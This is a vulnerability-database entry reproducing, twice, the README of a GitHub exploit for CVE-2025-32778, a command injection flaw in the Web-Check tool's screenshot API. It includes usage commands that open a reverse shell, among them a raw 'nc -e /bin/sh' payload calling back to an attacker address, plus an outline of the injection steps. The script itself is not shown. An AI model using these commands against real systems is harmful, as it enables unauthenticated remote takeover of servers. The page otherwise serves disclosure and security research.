Exploit for CVE-2025-32778_EB484048-BFE6-585B-9A92-3600B22D8B68

9.3 / 10

CRITICAL

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

Description

# CVE-2025-32778 - Web-Check Command Injection Exploit

[![Critical](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2025-32778)
[![Language: Python](https://img.shields.io/badge/Python-3.x-blue)](https://www.python.org/)

## Description

CVE-2025-32778 is a critical command injection vulnerability in **Web-Check** OSINT tool by Lissy93.
It allows unauthenticated attackers to execute arbitrary system commands via the `url` parameter in the screenshot API.

This Python script automates exploitation and can generate reverse shells or accept custom shell payloads.

---

## Warning

- Only test on systems you own or are authorized to test.
- Unauthorized use is illegal and unethical.

---

## Features

- Exploit `url` command injection in Web-Check.
- Supports:
- Reverse shell with `--lhost` and `--lport`.
- Custom shell via `--shell`.
- URL normalization.
- Prevents combining `--shell` with `--lhost/--lport`.

---

## Requirements

- Python 3.x
- Requests library:

```bash
pip install requests
```
---
## Usage
```bash
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
```
### Make the tool create a reverse shell
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
```
### Custom Shell Payload (Raw)
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
```
### Help Menu
```bash
python3 cve-2025-32778.py -h
```
---
## How It Works

1. Normalize the target URL to `scheme://host[:port]`.

2. Prepare the payload:
* Generate a reverse shell using `--lhost` and `--lport`.
* Or use a raw shell command with `--shell`.

3. Encode the shell payload for safe URL injection.

4. Send an HTTP GET request to `/api/screenshot/` with the payload.

5. Wait for the reverse shell connection.
---
## 🧑‍💻 Author
**00xCanelo**
[GitHub Profile](https://github.com/00xCanelo)

---
## References
- [Web-Check GitHub Repository](https://github.com/lissy93/web-check) – Original project containing the vulnerable code.
- [CVE-2025-32778](https://vulners.com/cve/CVE-2025-32778) – CVE entry describing the command injection vulnerability.

Visit Original Source

Basic Information

ID EB484048-BFE6-585B-9A92-3600B22D8B68

Published Aug 17, 2025 at 06:29

Modified Aug 18, 2025 at 01:37

{
    "lastseen": "2025-08-18T21:27:24",
    "description": "# CVE-2025-32778 - Web-Check Command Injection Exploit\n\n[![Critical](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2025-32778)\n[![Language: Python](https://img.shields.io/badge/Python-3.x-blue)](https://www.python.org/)\n\n## Description\n\nCVE-2025-32778 is a critical command injection vulnerability in **Web-Check** OSINT tool by Lissy93.  \nIt allows unauthenticated attackers to execute arbitrary system commands via the `url` parameter in the screenshot API.\n\nThis Python script automates exploitation and can generate reverse shells or accept custom shell payloads.\n\n---\n\n## Warning\n\n- Only test on systems you own or are authorized to test.\n- Unauthorized use is illegal and unethical.\n\n---\n\n## Features\n\n- Exploit `url` command injection in Web-Check.\n- Supports:\n  - Reverse shell with `--lhost` and `--lport`.\n  - Custom shell via `--shell`.\n- URL normalization.\n- Prevents combining `--shell` with `--lhost/--lport`.\n\n---\n\n## Requirements\n\n- Python 3.x\n- Requests library:\n\n```bash\npip install requests\n```\n---\n## Usage\n```bash\ngit clone https://github.com/00xCanelo/CVE-2025-32778\ncd CVE-2025-32778\n```\n### Make the tool create a reverse shell\n```bash\npython3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444\n```\n### Custom Shell Payload (Raw)\n```bash\npython3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell \"nc -e /bin/sh 10.10.10.1 4444\"\n```\n### Help Menu\n```bash\npython3 cve-2025-32778.py -h\n```\n---\n## How It Works\n\n1. Normalize the target URL to `scheme://host[:port]`.\n\n2. Prepare the payload:\n   * Generate a reverse shell using `--lhost` and `--lport`.\n   * Or use a raw shell command with `--shell`.\n\n3. Encode the shell payload for safe URL injection.\n\n4. Send an HTTP GET request to `/api/screenshot/` with the payload.\n\n5. Wait for the reverse shell connection.\n---\n## \ud83e\uddd1\u200d\ud83d\udcbb Author\n**00xCanelo**  \n[GitHub Profile](https://github.com/00xCanelo)\n\n---\n## References\n- [Web-Check GitHub Repository](https://github.com/lissy93/web-check) \u2013 Original project containing the vulnerable code.\n- [CVE-2025-32778](https://vulners.com/cve/CVE-2025-32778) \u2013 CVE entry describing the command injection vulnerability.  \n",
    "published": "2025-08-17T06:29:21",
    "modified": "2025-08-18T01:37:39",
    "type": "githubexploit",
    "title": "Exploit for CVE-2025-32778",
    "source": "",
    "references": "",
    "id": "EB484048-BFE6-585B-9A92-3600B22D8B68",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-32778"
    ],
    "sourceData": "",
    "sourceHref": "",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://github.com/00xCanelo/CVE-2025-32778",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

💭 Join the Security Discussion ❌ Cancel Reply